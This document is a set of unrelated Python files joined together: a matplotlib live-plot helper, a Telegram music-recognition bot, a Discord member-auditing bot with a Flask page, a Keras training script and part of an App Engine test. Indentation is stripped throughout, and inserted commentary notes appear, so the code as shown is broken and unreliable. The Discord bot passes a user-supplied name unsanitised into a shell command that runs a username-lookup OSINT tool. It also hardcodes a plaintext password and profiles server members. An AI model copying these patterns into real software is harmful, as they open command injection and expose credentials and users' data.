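#   ax.add_line(ln)
#   ax.add_line(pt)
#   pt.location((0.2, 0.3, 0.4))  # move the point afterwards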
# ------------------------------------------------
def set_aspect_equal_3d(ax):  # axes have to be equal
xlim = ax.get_xlim3d()
ylim = ax.get_ylim3d()
zlim = ax.get_zlim3d()
xmean = np.mean(xlim)
ymean = np.mean(ylim)
zmean = np.mean(zlim)
plot_radius = max([abs(lim - mean_) for lims, mean_ in ((xlim, xmean), (ylim, ymean), (zlim, zmean)) for lim in lims])
ax.set_xlim3d([xmean - plot_radius, xmean + plot_radius])
ax.set_ylim3d([ymean - plot_radius, ymean + plot_radius])
ax.set_zlim3d([zmean - plot_radius, zmean + plot_radius])
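# Illustrative note (hedged): matplotlib's 3D axes have historically had no
# reliable 'equal' aspect across all three axes, so the helper above expands
# every axis to the same half-width around its midpoint; call it after plotting:
#   set_aspect_equal_3d(ax)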
def move_figure(fig, xy):
backend = mpl.get_backend()
if backend == 'TkAgg':
fig.canvas.manager.window.wm_geometry("+%d+%d" % xy)
elif backend == 'WXAgg':
fig.canvas.manager.window.SetPosition(xy)
else: # QT and GTK
fig.canvas.manager.window.move(*xy)
# ------------------------------------------------
def update_data(q):
while q.alive:
line = sys.stdin.readline()
try:
temp = json.loads(line)
q.put(temp)
except:
pass
def update_plot(fig, q, func):
clk, cnt = 0, 0
while q.alive:
if not q.empty():
while q.qsize() > 0: item = q.get()  # drain the queue, keeping only the newest frame
clk, cnt = item['header']['time'], item['header']['number']
func(item)
q.fps[q.cnt % len(q.fps)] = time.time() % 1000000
q.cnt += 1
m = (max(q.fps) - min(q.fps)) / len(q.fps)
try:
fig.canvas.draw_idle()
fig.canvas.set_window_title(
'time: {} | count: {} | wait: {} | fps: {} | cycles: {:010} '.format(
'{:.3f}'.format(time.time())[-7:],
cnt,
q.qsize(),
int(1.0 / m),
clk))
time.sleep(1e-6)
except:
q.alive = False
def start_plot(fig, ax, func):
plt.show(block=False)
q = queue.Queue()
q.alive = True
q.cnt, q.fps = 0, [time.time(),] * 10
threading.Thread(target=update_plot, args=(fig, q, func)).start()
tu = threading.Thread(target=update_data, args=(q, ))
tu.daemon = True
tu.start()
plt.show(block=True)
q.alive = False
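# Illustrative usage sketch (hedged): a consumer script could pipe JSON frames
# into stdin and render each one via a callback. Only the 'header' keys
# ('time', 'number') read by update_plot() are assumed about the frame layout.
#   def on_frame(item):
#       pass  # update artists from the incoming frame here
#   fig = plt.figure()
#   ax = fig.add_subplot(111, projection='3d')
#   set_aspect_equal_3d(ax)
#   start_plot(fig, ax, on_frame)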
|
SongID.py
|
print(' _ _ ---==== Music Finder ====--- _ _\n')
from SongIDProcessor import SIDProcessor
from SongIDCore import *
from telegram import ParseMode
from telegram.utils.helpers import mention_html
import sys, traceback
from threading import Thread
import urllib.request # Check for internet connectivity
os.system(f'title _ _ ---==== Music Finder {ver} ====--- _ _') # Set the windows console window title
while True:
try:
ACR_PING_CODE = urllib.request.urlopen("https://identify-eu-west-1.acrcloud.com").getcode()
if ACR_PING_CODE == 200:
logger.info('ACR Cloud pinged successfully!')
break
else:
logger.warning('ACR Cloud ping error code: '+str(ACR_PING_CODE)+', retrying in 20 seconds')
time.sleep(20)
except:
logger.warning('Unable to ping ACR Cloud, retrying in 10 seconds')
time.sleep(10)
# Function from the telegram-bot-api wiki:
# https://github.com/python-telegram-bot/python-telegram-bot/wiki/Code-snippets#an-good-error-handler
def error(update, context):
# we want to notify the user of this problem. This will always work, but it will not notify users if the update is a
# callback or inline query, or a poll update. If you want to notify them in those cases too, keep in mind that
# sending the message could fail
try:
raise context.error
except telegram.error.Unauthorized as e:
logging.error(f'Unauthorized: {e}')
# remove update.message.chat_id from conversation list
except telegram.error.BadRequest as e:
logging.error(f'BadRequest: {e}')
# handle malformed requests - read more below!
except telegram.error.TimedOut as e:
logging.error(f'TimedOut: {e}')
# handle slow connection problems
except telegram.error.NetworkError as e:
logging.error(f'NetworkError: {e}')
# handle other connection problems
except telegram.error.ChatMigrated as e:
logging.error(f'ChatMigrated: {e}')
# the chat_id of a group has changed, use e.new_chat_id instead
except telegram.error.TelegramError as e:
logging.error(f'Telegram Error: {e}')
# handle all other telegram related errors
if 'An existing connection was forcibly closed by the remote host' in str(context.error):
#update.effective_message.reply_text('⚠️ Telegram closed the connection. Please try again.')
#logbot(update, '⚠️ Telegram closed the connection. Please try again.')
logger.info('existing connection closed (error exception catch temp code), pass')
pass
elif '[WinError 32] The process cannot access the file because it is being used by another process' in str(context.error):
logger.info('File cannot be accessed (likely deleted), being used by another process, pass')
pass
else:
if update != None:
text = "⚠️ An error occured, sorry for any inconvenience caused.\nThe developer has been notified and will look into this issue as soon as possible."
update.effective_message.reply_text(text)
# This traceback is created by accessing the traceback object from sys.exc_info, which is returned as the
# third value of the returned tuple. Then we use traceback.format_tb to get the traceback as a string, which,
# oddly, comes back as a list of strings that already contain their own line breaks, so simply joining on an
# empty string works fine.
trace = "".join(traceback.format_tb(sys.exc_info()[2]))
# lets try to get as much information from the telegram update as possible
payload = ""
# normally, we always have a user. If not, it's either a channel or a poll update.
if update.effective_user:
payload += f' with the user {mention_html(update.effective_user.id, update.effective_user.first_name)}'
# there are more situations when you don't get a chat
if update.effective_chat:
payload += f' within the chat <i>{update.effective_chat.title}</i>'
if update.effective_chat.username:
payload += f' (@{update.effective_chat.username})'
# but there is only one case where the payload can still be empty by now: a poll (buuuh)
if update.poll:
payload += f' with the poll id {update.poll.id}.'
# let's put this in a well-formatted text
text = f"⚠️ Uncaught error\n\nThe error <code>{context.error}</code> occured{payload}. The full traceback:\n\n<code>{trace}" \
f"</code>"
# and send it to the dev
context.bot.send_message(devid, text, parse_mode=ParseMode.HTML)
# we raise the error again, so the logger module catches it. If you don't use the logger module, use it.
raise
def stop_and_restart():
# Gracefully stop the Updater and replace the current process with a new one
u.stop()
os.execl(sys.executable, sys.executable, *sys.argv)
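# Illustrative note (hedged): os.execl replaces the current process image with a
# fresh interpreter running the same script and arguments. Following the library's
# documented restart snippet, stop_and_restart() is launched from a separate Thread
# (see restart() below), since stopping the Updater directly inside a handler
# reportedly blocks.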
# Respond when the developer sends the '/r' command
def restart(update, context):
update.message.reply_text(f'{botName} is restarting...')
Thread(target=stop_and_restart).start()
# Send a message to a specific user
def sendMsg(update, context):
logusr(update)
processed = SIDProcessor.commandArgs(update, context)
if processed == None:
logbotsend(update, context, '⚠️ Invalid syntax! <i>Make sure your spacing is correct</i>')
helpCMD(update, context)
elif processed[0] == 'too_long':
logbotsend(update, context, f'⚠️ Sorry, your message is {processed[1]} characters over our length limit')
else:
user = processed[0]
message = processed[1]
if user[0] == '@':
user = SIDProcessor.find_key(userdata, user[1:])[0]
context.bot.send_message(int(user), message, parse_mode=telegram.ParseMode.HTML)
logbotsend(update, context, 'Message sent!')
# Respond when the user sends the '/start' command
# (When the user adds a telegram bot, they are forced to send '/start')
def startCMD(update, context):
logusr(update)
userID=str(update.effective_chat.id)
username=str(update.effective_chat.username)
if userID not in userdata:
SIDProcessor.addUserData(update, '0', '0')
botsend(update, context, f'''<b>{botName}</b> is a Telegram bot that can identify music, similar to Shazam
Key Features:
- Scan for music in <b>videos</b>
- Scan for music playing around you with <b>Telegram Audio Message</b>
- Direct links to services such as <b>Youtube</b>, <b>Spotify</b> and <b>Deezer</b>
<i>[20MB file size limit]</i>
To get started, upload a file or record a Telegram Audio Message
Support: @DarkPentester''')
devsend(update, context, f'\'{update.message.text}\'')
logbot(update, '*Sent \'/start\' response*')
def limitCMD(update, context):
logusr(update)
botsend(update, context, '''Running a bot isn't free, and to keep costs low, we limit our daily API requests (comparing your audio to a third party music fingerprint database).
Unfortunately, we've hit that limit today, and we're sorry for any inconvenience in being unable to process your request.
Please try again tomorrow.
In the meantime, you could try using other music identification services such as "Shazam" and "Sound Hound". Unfortunately these services don't support sending videos or audio files and can only identify music with your microphone.
''')
devsend(update, context, f'\'{update.message.text}\'')
logbot(update, '*Sent \'/limit\' response*')
# Respond when the user sends an unknown command
def unknownCMD(update, context):
devsend(update, context, f'\'{update.message.text}\'')
logusr(update)
logbotsend(update, context, "Sorry, I didn't understand that command.")
# Send user information on how to use the bot when they send '/help'
def helpCMD(update, context):
logusr(update)
botsend(update, context, f'''--= How to use {botName} =--
1. Send me a file: I will scan the file for music
---> You can send me an audio/video file on your device by pressing the paperclip icon in the bottom left
---> Record a Telegram audio message with the microphone icon in the bottom right and capture music playing around you.
File size limit: 20MB
If you exceed this limit, we won't be able to scan your file for music!''')
devsend(update, context, f'\'{update.message.text}\'')
logbot(update, '*Sent help information*')
# Notify the user that their uploaded file isn't supported
def invalidFiletype(update, context):
logusr(update)
botsend(update, context, 'Sorry, we don\'t scan those types of files.\nPlease upload an <b>audio</b> or <b>video</b> file containing the music you wish to scan, or <b>record/hum</b> a <b>Telegram Voice Message</b>.\n\n<i>20MB file size limit</i>')
context.bot.send_message(devid, f'User @{update.effective_user.username} ({update.effective_chat.id}) sent an invalid filetype')
logbot(update, '*Sent invalid-filetype response*')
# Send the user the data we have saved on them when they send '/mydata'
def mydataCMD(update, context):
logusr(update)
data=SIDProcessor.getUserData(update)
user = update.effective_chat.id
username = data["username"]
name = data["name"].replace(' None', '')
api_calls = data["api_calls"]
last_call = round(int(time.time()) - int(data["last_call"]))
lc=SIDProcessor.getUserData(update)['last_call']
botsend(update, context, f'''Here is the data we have stored about you:
<b>User ID</b>: {user}
<b>Username</b>: @{username}
<b>Full Name</b>: {name}
<b>API Calls</b>: {api_calls}
<b>Last API Call</b>: {last_call} seconds ago
<i>We do not store more data than we need to, and we delete your uploaded audio files as soon as we've finished processing them</i>
''')
devsend(update, context, f'\'{update.message.text}\'')
logbot(update, '*Sent user data*')
# Respond to the user entering a command when in debug mode
def maintenanceINFO(update, context):
logusr(update)
context.bot.send_message(devid, f'User @{update.effective_user.username} ({update.effective_chat.id}) [MAINTENANCE MODE]: \'{update.message.text}\'')
logbotsend(update, context, 'We\'re currently under maintenance, please try again later')
def noisyProcess(update, context):
SIDProcessor.fileProcess(update, context, 'noisy')
# Currently not in use
def clearProcess(update, context):
SIDProcessor.fileProcess(update, context, 'clear')
def humProcess(update, context):
SIDProcessor.fileProcess(update, context, 'hum')
maintenance = 0
dp.add_error_handler(error) # Handle uncaught exceptions
if maintenance == 1:
logger.info('- - - - MAINTENANCE MODE ENABLED - - - -')
dp.add_handler(CommandHandler('start', startCMD)) # Respond to '/start'
dp.add_handler(CommandHandler('mydata', mydataCMD, filters=Filters.user(username=devusername))) # Respond to '/mydata'
dp.add_handler(CommandHandler('help', helpCMD, filters=Filters.user(username=devusername))) # Respond to '/help'
dp.add_handler(CommandHandler('limit', limitCMD, filters=Filters.user(username=devusername))) # Respond to '/limit'
# Handle different types of file uploads
dp.add_handler(MessageHandler(Filters.audio & Filters.user(username=devusername), noisyProcess))
dp.add_handler(MessageHandler(Filters.video & Filters.user(username=devusername), noisyProcess))
dp.add_handler(MessageHandler(Filters.voice & Filters.user(username=devusername), humProcess))
dp.add_handler(MessageHandler(Filters.photo & Filters.user(username=devusername), invalidFiletype)) # Notify user of invalid file upload
dp.add_handler(MessageHandler(Filters.document & Filters.user(username=devusername), invalidFiletype)) # Notify user of invalid file upload
dp.add_handler(CommandHandler('r', restart, filters=Filters.user(username=devusername))) # Allow the developer to restart the bot
dp.add_handler(CommandHandler('send', sendMsg, filters=Filters.user(username=devusername))) # Allow the developer to send messages to users
dp.add_handler(MessageHandler(Filters.command, unknownCMD)) # Notify user of invalid command
#dp.add_handler(MessageHandler(Filters.text & Filters.user(username=devusername), helpCMD)) # Respond to '/help'
dp.add_handler(MessageHandler(Filters.text, maintenanceINFO)) # Respond to text
elif maintenance == 0:
dp.add_handler(CommandHandler('start', startCMD)) # Respond to '/start'
dp.add_handler(CommandHandler('mydata', mydataCMD)) # Respond to '/mydata'
dp.add_handler(CommandHandler('help', helpCMD)) # Respond to '/help'
dp.add_handler(CommandHandler('limit', limitCMD)) # Respond to '/limit'
# Handle different types of file uploads
dp.add_handler(MessageHandler(Filters.audio, noisyProcess))
dp.add_handler(MessageHandler(Filters.video, noisyProcess))
dp.add_handler(MessageHandler(Filters.voice, humProcess))
dp.add_handler(MessageHandler(Filters.photo, invalidFiletype)) # Notify user of invalid file upload
dp.add_handler(MessageHandler(Filters.document, invalidFiletype)) # Notify user of invalid file upload
dp.add_handler(CommandHandler('r', restart, filters=Filters.user(username=devusername))) # Allow the developer to restart the bot
dp.add_handler(CommandHandler('send', sendMsg, filters=Filters.user(username=devusername))) # Allow the developer to send messages to users
dp.add_handler(MessageHandler(Filters.command, unknownCMD)) # Notify user of invalid command
dp.add_handler(MessageHandler(Filters.text, helpCMD)) # Respond to text
logger.info('Loaded: Handlers')
logger.info('Loading Complete!')
if heroku_enabled == 'True':
logger.info('Initialising Heroku webhook...')
PORT = int(os.environ.get('PORT', int(heroku_port)))
u.start_webhook(listen=heroku_listen,
port=int(PORT),
url_path=token)
u.bot.setWebhook(heroku_webhook + token)
logger.info('Heroku webhook initialised')
else:
u.start_polling()
logger.info('Standard polling initialised')
u.idle()
|
cleanser.py
|
# https://discordapp.com/oauth2/authorize?client_id=703918313880944705&scope=bot&permissions=8
import discord, asyncio, time, datetime, threading, timeago, pytz, os
from flask import Flask, render_template, request
from hashlib import sha256
from subprocess import check_output
TOKEN = "no, go away"
GUILD = 649119550633410611
# runs synchronously in the main thread
client = discord.Client()
# runs asynchronously in a separate thread
app = Flask(__name__)
# dict of active users to datetime of last seen message, will be accessed across threads (thread safe: only the main thread will write to it)
# do not use this as the sole criterion! whitelist people who have elevated permissions, bots, etc.
active = {}
commands = {} # command: function(message) declared in "if __name__" thing
def findUnclean(guild):
# remember to update the "active" list by doing the bot command in the chat!
unclean = []
for member in guild.members:
if len(member.roles) == 1 and member not in active: # '@everyone' role is distributed to everyone
unclean.append(member)
return unclean
async def updateActive(days=5):
# takes ~5s in hypixel central with days=5
active.clear()
# activity must be recorded after this point
after = datetime.datetime.now() - datetime.timedelta(days=days)
for channel in client.get_guild(GUILD).text_channels:
async for m in channel.history(after=after, oldest_first=True):
if m.author in active and (m.created_at - active[m.author]).total_seconds() > 0: # if m is the latest message
active[m.author] = m.created_at
elif m.author not in active:
active[m.author] = m.created_at
def htmlTable(members):
members = [{
"name": user.name,
"nick": user.nick if user.nick else "",
"mention": user.mention,
"joined": timeago.format(user.joined_at),
"age": timeago.format(user.created_at)
} for user in members]
return render_template("index.html", users=members)
def personalizedEmbed(member):
def statusString(status):
return "Online" if status == discord.Status.online else \
"Offline" if status == discord.Status.offline else \
"Idle" if status == discord.Status.idle else \
"Do not disturb" if status == discord.Status.dnd else \
status
u = member
data = {
"Generic": {
"Name": str(u),
"Display Name": u.display_name,
"Mention": u.mention,
"ID": u.id,
"Animated Avatar": str(u.is_avatar_animated()),
"Robot": str(u.bot)
},
"Age": {
"Joined at": str(u.joined_at),
"Joined server": timeago.format(u.joined_at),
"Created at": str(u.created_at),
"Created": timeago.format(u.created_at)
},
"Temporary data": {
"Last Nitro Boost": str(u.premium_since) if u.premium_since else "",
"Activity": f"{u.activity}" if u.activity else "",
"Voice State": str(u.voice),
"Top Role": str(u.top_role),
"Roles": ", ".join([f"{r} ({timeago.format(r.created_at)})" for r in u.roles]).replace("@everyone ", "everyone ")
},
"Status": {
"Status": statusString(u.status),
"Desktop Status": statusString(u.desktop_status),
"Mobile Status": statusString(u.mobile_status),
"Web Status": statusString(u.web_status),
"Currently Mobile": str(u.is_on_mobile())
}
}
embed = discord.Embed(
title=f"{u.name} ({u.nick})" if u.nick is not None else u.name,
type="rich",
color=discord.Color.from_rgb(0, 139, 139)
)
embed.set_image(url=u.avatar_url)
for catName, cat in data.items():
embed.add_field(name=catName, value="\n".join([f"{k}: {v}" for k, v in cat.items()]), inline=False)
return embed
def sherlock(un):
path = os.path.dirname(os.path.abspath(__file__))
out = check_output(f"python \"{path}/sherlock/sherlock.py\" --print-found --no-color {un}").decode().strip()
out = "\n".join([line for line in out.split("\r\n") if line[1] in "+*"])
return out
@app.route("/")
def root():
if "auth" in request.args and request.args["auth"] == sha256(b"Litago123#").hexdigest():
# auth approved
guild = client.get_guild(GUILD) # hypixel central
return htmlTable(findUnclean(guild))# guild.members
else:
# if no authentication is given then return the chicken broth
return '<!doctype html><html lang="en"> <head> <meta property="og:title" content="Litago smaker godt"/><meta property="og:type" content="website"/><meta property="og:url" content="http://litago.xyz"/><meta property="og:image" content="http://litago.xyz/static/chicken.gif"/><meta property="og:description" content="Litago > Cocio"/> <title>401 fuck off</title> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no"> <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta.2/css/bootstrap.min.css" integrity="sha384-PsH8R72JQ3SOdhVi3uxftmaW6Vc51MKb0q5P2rRUpPvrszuE4W1povHYgTpBfshb" crossorigin="anonymous"> </head> <body> <div class="container"> <img src="http://litago.xyz/static/chicken.gif" alt=""> </div><script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script> <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.3/umd/popper.min.js" integrity="sha384-vFJXuSJphROIrBnz7yo7oB41mKfc8JzQZiCq4NCceLEaO4IHwicKwpJf9c9IpFgh" crossorigin="anonymous"></script> <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0-beta.2/js/bootstrap.min.js" integrity="sha384-alpBpkh1PFOepccYVYDB4do5UnbKysX5WZXm3XxPqe5iKTfUKjNkCk9SaVuEZflJ" crossorigin="anonymous"></script> </body></html>'
class MessageCommands:
async def help(message):
await message.channel.send("Availible commands: \n" + "\n".join(commands.keys()))
async def update(message):
if "doki club members" not in [r.name.lower() for r in message.author.roles]:
await message.channel.send("Elevated privileges required: 'DOKI CLUB MEMBERS'")
return None
a = time.time()
await updateActive()
await message.channel.send(f"Finished updating in {round(time.time() - a, 2)} seconds")
async def person(message):
# give all info about the user
if len(message.mentions) == 0:
await message.channel.send(embed=personalizedEmbed(message.author))
elif len(message.mentions) > 5:
await message.channel.send("Limit reached: Max 5 users at a time.")
else:
for member in message.mentions:
await message.channel.send(embed=personalizedEmbed(member))
async def time(message):
timeString = lambda tz: datetime.datetime.now(pytz.timezone(tz)).strftime("**%X** %a %b %d")
await message.channel.send("\n".join([
"TZs:",
f"**New Zealand** (Pacific/Auckland): {timeString('Pacific/Auckland')}",
f"**Norway** (Europe/Oslo): {timeString('Europe/Oslo')}",
f"**USA (SC)** (US/Eastern): {timeString('US/Eastern')}"
]))
async def sherlock(message):
if message.author.id != 165140141751402496:
await message.channel.send("You have to be __me__ to use this command (due to latency)")
return None
args = message.content.split(" ")[1:]
await message.channel.send(sherlock(" ".join(args)))
@client.event
async def on_message(message):
if message.author == client.user:
return None
else:
for cmd in commands:
if message.content.strip().lower().startswith(cmd):
await commands[cmd](message)
break
@client.event
async def on_ready():
print(f"Booted at {time.asctime()}")
a = time.time()
await updateActive()
print(time.time()-a, "s used to updated active")
if __name__ == "__main__":
commands = {
";help": MessageCommands.help,
";update": MessageCommands.update,
";person": MessageCommands.person,
";time": MessageCommands.time,
";sherlock": MessageCommands.sherlock
}
threading.Thread(target=app.run, kwargs={"host": "0.0.0.0", "port": 80, "debug": False}).start()
client.run(TOKEN)
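# Illustrative sketch (hedged; the command name below is made up): adding another
# ';'-prefixed command only needs a coroutine plus an entry in the `commands`
# dict, since on_message() dispatches on the message prefix.
#   async def ping(message):
#       await message.channel.send("pong")
#   commands[";ping"] = ping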
|
runModel.py
|
import sys, csv, math, random, os
import numpy as np
from Cnn3DModel import Cnn3DModel
from FaceDataset import FaceDataset
from ExtendedFeatureDataset import ExtendedFeatureDataset
from FaceDataset_tiny import FaceDataset_tiny
from FaceDataset_tiny_classifier import FaceDataset_tiny_classifier
from multiprocessing import Process, Queue
from keras.callbacks import EarlyStopping, ModelCheckpoint,ReduceLROnPlateau
from keras.optimizers import SGD, Adam
from keras.models import model_from_json
from multiprocessing import Process, Queue
class runModel:
trainingDataset = None;
validationDataset = None;
testDataset = None;
output_path = "";
input_path = "";
model = None;
def __init__(self, input_path, output_path):
print("create instance...");
self.output_path = output_path;
self.input_path = input_path;
# load dataset
print("load dataset...");
#self.trainingDataset = FaceDataset_tiny(self.input_path, "train_database_complete_shuffled.h5", "train");
#self.validationDataset = FaceDataset_tiny(self.input_path, "val_database_complete_shuffled.h5", "val");
#self.testDataset = FaceDataset_tiny(self.input_path, "test_database_complete.h5", "test");
self.trainingDataset = FaceDataset(self.input_path, "train_database_complete.h5", "train");
self.validationDataset = FaceDataset(self.input_path, "val_database_complete.h5", "val");
self.testDataset = FaceDataset(self.input_path, "test_database_complete.h5", "test");
#self.trainingDataset = ExtendedFeatureDataset(self.input_path, "train_database_complete_shuffled.h5", "train");
#self.validationDataset = ExtendedFeatureDataset(self.input_path, "val_database_complete_shuffled.h5", "val");
#self.testDataset = ExtendedFeatureDataset(self.input_path, "test_database_complete.h5", "test");
trainingDatasetSamples = self.trainingDataset.size();
print("trainingset sample size: " + str(trainingDatasetSamples));
validationDatasetSamples = self.validationDataset.size();
print("validationset sample size: " + str(validationDatasetSamples));
testDatasetSamples = self.testDataset.size();
print("testset sample size: " + str(testDatasetSamples));
# create CNNModel instance
self.model = Cnn3DModel(self.trainingDataset, self.validationDataset, self.testDataset, self.output_path);
def runTrainingMode(self):
#set hyperparameters
params = [0.1, 0, 0.002, 0.2];
#params = [0.1, 0, 0.0, 0.0];
#params = [0.1, 0, 0.9, 0.999, 1e-8, 0.002, 0.0];
self.model.setHyperparameters(params);
#select optimizer
self.model.selectOptimizer("sgd");
#self.model.selectOptimizer("adam");
# create model
self.model.createModel();
#save model architecture to file
self.model.saveModelArch();
# compile model
self.model.compileModel();
# print model summary
self.model.printModelSummary();
# create callback functions
self.model.createCallbacks();
# train model
history = self.model.trainModel();
# save history to csv
self.model.saveTrainingHistoryToCSV();
#evaluate final model
#scores = self.model.evaluateModel();
#print(scores);
# save predictions to csv
self.model.savePredictionsToCSV();
def runAdditionalTrainingMode(self, path):
# load architecture
self.model.loadModelArch(path + "Model/model.json");
#load model weights
self.model.loadWeights(path + "Model/weights_best.h5");
#set hyperparameters
params = [0.001, 0, 0.002, 0.2];
self.model.setHyperparameters(params);
#select optimizer
self.model.selectOptimizer("sgd");
# compile model
self.model.compileModel();
# print model summary
self.model.printModelSummary();
# create callback functions
self.model.createCallbacks();
# train model
history = self.model.trainModel();
# save history to csv
self.model.saveTrainingHistoryToCSV();
#evaluate final model
scores = self.model.evaluateModel();
print(scores);
# save predictions to csv
self.model.savePredictionsToCSV();
def runTestMode(self):
#print("NOT IMPLEMENTED");
print("load model architecture...");
self.model.loadModelArch(self.output_path + "Model/model.json");
print("load best model weights...");
self.model.loadWeights(self.output_path + "Model/weights_best.h5");
# compile model
self.model.compileModel();
#print("test model...");
#self.model.testModel();
self.model.validateModel();
def calculateTrainingsPredictions(self):
print("load model architecture...");
self.model.loadModelArch(self.output_path + "Models/model.json");
print("load best model weights...");
self.model.loadWeights(self.output_path + "Models/weights_best.h5");
# compile model
self.model.compileModel();
# calculate predictions
self.model.saveTrainingPredictionsToCSV();
def runEvaluateBestModel(self):
print("find best model");
scores = [];
directories = os.listdir(self.output_path);
print(directories);
for directory in directories:
print(directory);
print("load model architecture from " + str(directory));
# load architecture
self.model.loadModelArch(self.output_path + directory + "/model.json");
#load model weights
self.model.loadWeights(self.output_path + directory + "/weights_best.h5");
# compile model
self.model.compileModel();
# evaluate model
scores.append(self.model.evaluateModel());
# save predictions to csv
self.model.savePredictionsToCSV();
scores = np.array(scores);
idx = scores[:,1].argmax();
scores_best = scores[idx] * 100.0;
print("directory name: " + str(directories[idx]));
print("---------------------------------------");
print("evaluation accuracy of best model: " + str(scores_best[1]) + "%");
print("evaluation error of best model: " + str(scores_best[0]) + "%");
def runHyperparameterSearch(self, nCombinations):
for i in range(0, nCombinations):
# select random params
params = self.model.selectRandomParams('sgd');
self.run_in_separate_process(self.trainModelCombinations, (params, ));
def trainModelCombinations(self, params):
#set hyperparameters
self.model.setHyperparameters(params);
#select optimizer
self.model.selectOptimizer('sgd');
# create model
self.model.createModel();
#save model architecture to file
self.model.saveModelArch();
# compile model
self.model.compileModel();
# create callback functions
self.model.createCallbacks();
# train model
history = self.model.trainModel();
# save history to csv
self.model.saveTrainingHistoryToCSV();
# save predictions to csv
self.model.savePredictionsToCSV();
def run_in_separate_process(self, method, args):
def queue_wrapper(q, params):
r = method(*params)
q.put(r)
q = Queue()
p = Process(target=queue_wrapper, args=(q, args))
p.start()
#return_val = q.get()
p.join()
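# Illustrative note (hedged): training each hyperparameter combination in a
# child process is a common way to make sure the framework releases GPU/host
# memory between runs; the parent simply blocks on p.join(). A minimal sketch
# with made-up names:
#   def train_once(params):
#       return params  # stand-in for a full training run
#   runner.run_in_separate_process(train_once, ([0.1, 0, 0.002, 0.2],))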
def visTest(self):
print("load model architecture...");
self.model.loadModelArch(self.output_path + "Model/model.json");
print("load best model weights...");
self.model.loadWeights(self.output_path + "Model/weights_best.h5");
# compile model
self.model.compileModel();
self.model.generate_cam();
def run_visualization(self):
# load architecture
print("load model architecture...");
#self.model.loadModelArch(self.output_path + "Model/model.json");
self.model.addDecoder();
# compile model
self.model.compileModel();
# print model summary
self.model.printModelSummary();
print("visualize layer outputs");
self.model.getLayerOutput();
#self.model.visualize_class_activation_map();
|
apiproxy_stub_map_test.py
|
#!/usr/bin/env python
#
# Copyright 2007 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""Tests for google.appengine.api.apiproxy_stub_map."""
from concurrent import futures
import threading
import traceback
import google
from absl import app
from six.moves import range
from google.appengine.api import apiproxy_rpc
from google.appengine.api import apiproxy_stub_map
from absl.testing import absltest
class APIProxyStubMapTest(absltest.TestCase):
"""Tests for API proxy stub map."""
def setUp(self):
super(APIProxyStubMapTest, self).setUp()
self.stubmap = apiproxy_stub_map.APIProxyStubMap()
def testCrudForHooks(self):
"""Tests for the precall stubs."""
hooks = self.stubmap.GetPreCallHooks()
order = []
self.assertEmpty(hooks)
def MakeFunction(number):
def Result(service, call, request, response):
order.append(number)
return Result
self.assertTrue(hooks.Append('a', MakeFunction(2)))
self.assertTrue(hooks.Append('b', MakeFunction(3)))
self.assertFalse(hooks.Append('b', MakeFunction(17)))
self.assertLen(hooks, 2)
self.assertTrue(hooks.Push('c', MakeFunction(1)))
self.assertLen(hooks, 3)
hooks.Call(None, None, None, None)
self.assertEqual([1, 2, 3], order)
hooks.Clear()
self.assertEmpty(hooks)
def testExtendedHookArgs(self):
"""Tests for extended 5-argument hooks."""
for hooks in [self.stubmap.GetPreCallHooks(),
self.stubmap.GetPostCallHooks()]:
rpc_args = []
self.assertEmpty(hooks)
def MakeFunction(extended):
if extended:
def Result(service, call, request, response, rpc):
rpc_args.append(rpc)
return Result
else:
def Result(service, call, request, response):
rpc_args.append(None)
return Result
class BoundMethod:
def WithRPC(self, service, call, request, response, rpc):
rpc_args.append(rpc)
def WithoutRPC(self, service, call, request, response):
rpc_args.append(None)
bound = BoundMethod()
self.assertTrue(hooks.Append('a', MakeFunction(True)))
self.assertTrue(hooks.Append('b', MakeFunction(False)))
self.assertTrue(hooks.Append('c', bound.WithRPC))
self.assertTrue(hooks.Append('d', bound.WithoutRPC))
self.assertLen(hooks, 4)
rpc_sentinel = "sentinel"
hooks.Call(None, None, None, None, rpc_sentinel)
self.assertEqual([rpc_sentinel, None, rpc_sentinel, None], rpc_args)
def testSuperExtendedHookArgs(self):
"""Tests for extended 6-argument hooks."""
hooks = self.stubmap.GetPostCallHooks()
rpc_passed = '-RPC-'
error_passed = '-ERR-'
error_omitted = '-NOPE-'
rpc_args = []
self.assertEmpty(hooks)
def MakeFunction(super_extended):
if super_extended:
def Result(service, call, request, response, rpc, error):
rpc_args.append((rpc, error))
else:
def Result(service, call, request, response, rpc):
rpc_args.append((rpc, error_omitted))
return Result
self.assertTrue(hooks.Append('a', MakeFunction(True)))
self.assertTrue(hooks.Append('b', MakeFunction(False)))
self.assertLen(hooks, 2)
hooks.Call(None, None, None, None, rpc_passed)
self.assertEqual([(rpc_passed, None),
(rpc_passed, error_omitted)], rpc_args)
rpc_args = []
hooks.Call(None, None, None, None, rpc_passed, error_passed)
self.assertEqual([(rpc_passed, error_passed)], rpc_args)
def testMakeSyncCall(self):
"""Makes sure that the hooks are executed in the right order."""
calls = []
def Pre(service, call, request, response):
calls.append('pre')
class Stub(object):
def MakeSyncCall(self, service, call, request, response):
calls.append('stub')
def Post(service, call, request, response):
calls.append('post')
self.stubmap.GetPreCallHooks().Append('before', Pre)
self.stubmap.RegisterStub('service1', Stub())
self.stubmap.GetPostCallHooks().Append('after', Post)
self.assertIsNone(self.stubmap.MakeSyncCall('service1', None, None, None))
self.assertEqual(['pre', 'stub', 'post'], calls)
calls = []
self.stubmap.GetPreCallHooks().Clear()
self.assertIsNone(apiproxy_stub_map.MakeSyncCall('service1', None,
None, None,
stubmap=self.stubmap))
self.assertEqual(['stub', 'post'], calls)
def testMakeSyncCallReturnValue(self):
"""Tests return value of MakeSyncCall.
Tests that MakeSyncCall() correctly returns value returned by
